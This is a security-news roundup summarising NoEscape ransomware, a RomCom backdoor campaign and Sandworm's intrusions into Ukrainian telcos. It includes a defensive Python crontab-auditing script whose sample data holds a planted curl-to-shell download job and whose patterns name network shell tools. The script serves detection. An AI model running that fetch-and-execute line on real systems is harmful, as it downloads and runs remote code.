“Unlike many of its contemporaries, however, the unknown developers of this ransomware claim that in lieu of using source code or leaks from other established ransomware families, they have constructed their malware and its associated infrastructure entirely from scratch,” HC3 noted.

The Ransomware-as-a-Service (RaaS) group has been observed encrypting files on a victim’s computer and demanding ransoms, as well as providing services to fellow cybercriminals.

HC3 provided technical details about the group's tactics that healthcare defenders can use to understand its techniques. For example, HC3 noted that the Windows encryptor only runs on Windows NT 10.0 (Windows 10 and later), but the operation is also capable of encrypting data on Linux machines and VMware ESXi hosts.

Nearly a quarter of NoEscape's observed attacks have targeted US-based organizations, and the group has been known to demand ransoms ranging from hundreds of thousands of dollars to more than $10 million.

“Since NoEscape operates as a RaaS, its targets vary depending on the affiliate and the buyer. Its creators, like many ransomware gangs, do not target Commonwealth of Independent States (CIS), or ex-Soviet Union republics, while disproportionately targeting the United States and several European countries as its preferred victims,” the analyst note continued.

“The service allows operators and affiliates to take advantage of multi-extortion tactics, including triple extortion methods to maximize the impact of a successful attack,” HC3 continued.

HC3 recommended that defenders continue to prioritize ransomware mitigations, such as regular software updates, backups, and strong passwords. As always, employee education and training remains crucial to reducing risk.

“The probability of cyber threat actors targeting any industry remains high, but especially so for the Healthcare and Public Health sector,” HC3 warned. “Prioritizing security by maintaining awareness of the threat landscape, assessing their situation, and providing staff with tools and resources necessary to prevent a cyberattack remains the best way forward for healthcare organizations.”

Source – https://healthitsecurity.com/news/noescape-ransomware-emerges-targeting-healthcare



New RomCom Backdoor Targets Female Political Leaders

Researchers have uncovered a new malicious campaign targeting female political leaders and attendees of the Women Political Leaders (WPL) Summit held in Brussels in June 2023.

The threat actor, Void Rabisu, started deploying a new version of its RomCom backdoor, tracked as RomCom 4.0 (Microsoft tracks it as Peapod), in early August 2023; the findings were reported in a malware analysis published on October 13.

The backdoor payload was hidden in a malicious copy of the official website of the WPL Summit, which aims to improve gender equality in politics.

While the ‘Videos & photos’ link of the legitimate domain redirects visitors to a Google Drive folder containing photographs from the event, the wplsummit[.]com fake website directed visitors to a OneDrive folder containing two compressed files and an executable called Unpublished Pictures 1-20230802T122531-002-sfx.exe. The latter file appears to be a piece of malware.

This tactic is similar to a previous Void Rabisu campaign in June, when the group used the Ukrainian World Congress and the July 2023 NATO summit as lures to deliver an exploit for CVE-2023-36884, then a zero-day remote code execution flaw in Office and Windows HTML. That campaign was reported by Microsoft in July.

Additionally, Void Rabisu is using a technique in its latest campaigns that has not previously been reported on: the RomCom command-and-control (C2) servers enforce specific TLS behaviour from clients and ignore requests that do not conform, which makes automated discovery of RomCom infrastructure more difficult.

Void Rabisu used this technique in a May 2023 RomCom campaign that spread a malicious copy of the legitimate PaperCut software, in which the C2 server ignored requests that were not conformant.

Void Rabisu, also known as Storm-0978, Tropical Scorpius, and UNC2596, is a hybrid threat actor conducting financially motivated and espionage attacks. The group was first identified in early 2022 but is believed to have been active for longer than that. It was initially considered a financially motivated threat actor because of its associated Cuba ransomware.

However, in August 2022, Cuba ransomware was involved in an attack targeting the parliament of Montenegro. This led security researchers to assume the group was pursuing a geopolitical agenda.

This hypothesis was later confirmed as Void Rabisu started targeting the Ukrainian government and military, their energy and water utility sectors as well as EU politicians and government spokespersons.

Source – https://www.infosecurity-magazine.com/news/romcom-backdoor-female-political/

Russian Sandworm Hackers Breached 11 Ukrainian Telcos Since May

The state-sponsored Russian hacking group tracked as ‘Sandworm’ has compromised eleven telecommunication service providers in Ukraine between May and September 2023.

That is based on a new report by Ukraine’s Computer Emergency Response Team (CERT-UA) citing ‘public resources’ and information retrieved from some breached providers.

The agency states that the Russian hackers “interfered” with the communication systems of 11 telcos in the country, leading to service interruptions and potential data breaches.

Sandworm is a very active espionage threat group linked to Russia's GRU (military intelligence). The attackers have focused on Ukraine throughout 2023, using phishing lures, Android malware, and data wipers.

The attacks begin with Sandworm performing reconnaissance on the telecommunication company's network using the 'masscan' tool.

Sandworm looks for open ports and unprotected RDP or SSH interfaces they can leverage to breach the network.

Additionally, the attackers use tools like ‘ffuf’, ‘dirbuster’, ‘gowitness’, and ‘nmap’ to find potential vulnerabilities in web services that can be exploited to gain access.

Compromised VPN accounts that weren’t protected by multi-factor authentication have also been leveraged to gain network access.

To make their intrusions stealthier, Sandworm uses 'Dante', 'socks5', and other proxy servers to route malicious activity through servers in Ukrainian IP space that they had compromised previously, so that the traffic appears less suspicious.

CERT-UA reports seeing two backdoors in breached ISP systems, namely ‘Poemgate’ and ‘Poseidon.’

Poemgate captures the credentials of administrators who authenticate to the compromised endpoint, providing the attackers with additional accounts they can use for lateral movement or deeper network infiltration.

Poseidon is a Linux backdoor that the Ukrainian agency says “includes the full range of remote computer control tools.” Persistence for Poseidon is achieved by modifying Cron to add rogue jobs.

Sandworm uses the ‘Whitecat’ tool to remove the attack’s traces and delete access logs.

At the final stages of the attack, the hackers were seen deploying scripts that would cause service disruption, especially focusing on Mikrotik equipment, and wipe backups to make recovery more challenging.
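One of the few persistence mechanisms named above is ordinary: Poseidon stays resident by adding rogue cron jobs. A defender can hunt for that without any sample of the backdoor by auditing crontab content for jobs that run from world-writable or hidden directories, pipe downloads into a shell, or decode embedded payloads. The script below is an added example (not from CERT-UA or any vendor); the crontab lines and the IP address in them are constructed, and the heuristics are assumptions to extend with site-specific knowledge.

```python
"""Hunt for suspicious cron persistence in system-crontab format
(minute hour dom month dow user command, or @reboot user command).

Added example; SAMPLE_CRONTAB is constructed and the heuristics are
starting points, not a complete rule set."""
import re

SUSPICIOUS_PATHS = ("/tmp/", "/dev/shm/", "/var/tmp/")
SUSPICIOUS_PATTERNS = [
    (r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b", "downloads and pipes to a shell"),
    (r"\bbase64\s+(-d|--decode)\b", "decodes an embedded payload"),
    (r"\b(nc|ncat|socat)\b", "uses a raw network tool"),
    (r"/\.[^/\s]+/", "runs from a hidden directory"),
]

# Constructed /etc/crontab content: two stock Debian-style lines, one
# legitimate backup job, and two planted persistence entries.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5 *   * * *   root    /dev/shm/.x/update >/dev/null 2>&1
@reboot         root    curl -s http://198.51.100.23/a.sh | sh
0 3     * * *   backup  /usr/local/bin/rotate-backups.sh
"""


def parse_crontab(text: str) -> list[tuple[str, str, str]]:
    """Return (schedule, user, command) for each job line."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                      # @reboot, @daily, ...
            special, user, command = line.split(None, 2)
            entries.append((special, user, command))
            continue
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        entries.append((" ".join(parts[:5]), parts[5], parts[6]))
    return entries


def audit_crontab(text: str) -> list[dict]:
    """Jobs matching any heuristic, with the reasons they were flagged."""
    findings = []
    for schedule, user, command in parse_crontab(text):
        reasons = []
        if any(p in command for p in SUSPICIOUS_PATHS):
            reasons.append("executes from a world-writable temp directory")
        for pattern, why in SUSPICIOUS_PATTERNS:
            if re.search(pattern, command):
                reasons.append(why)
        if reasons:
            findings.append({"schedule": schedule, "user": user,
                             "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{f['user']}] {f['schedule']}: {f['command']}\n    -> {', '.join(f['reasons'])}")
```

Run the same audit over `/etc/cron.d/*` and every user's crontab, and compare the result against the previous snapshot: a job that was not there yesterday is the strongest signal, whatever its command looks like. Note that a log-wiping tool such as the one named above removes evidence from access logs, not from the crontab itself, which is one reason persistence artefacts are worth checking directly.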

CERT-UA advises that all service providers in the country follow the recommendations in its guidance to make it harder for intruders to breach their systems.

Source – https://www.bleepingcomputer.com/news/security/russian-sandworm-hackers-breached-11-ukrainian-telcos-since-may/

Smarttech247

    Copyright Smarttech247 - 2021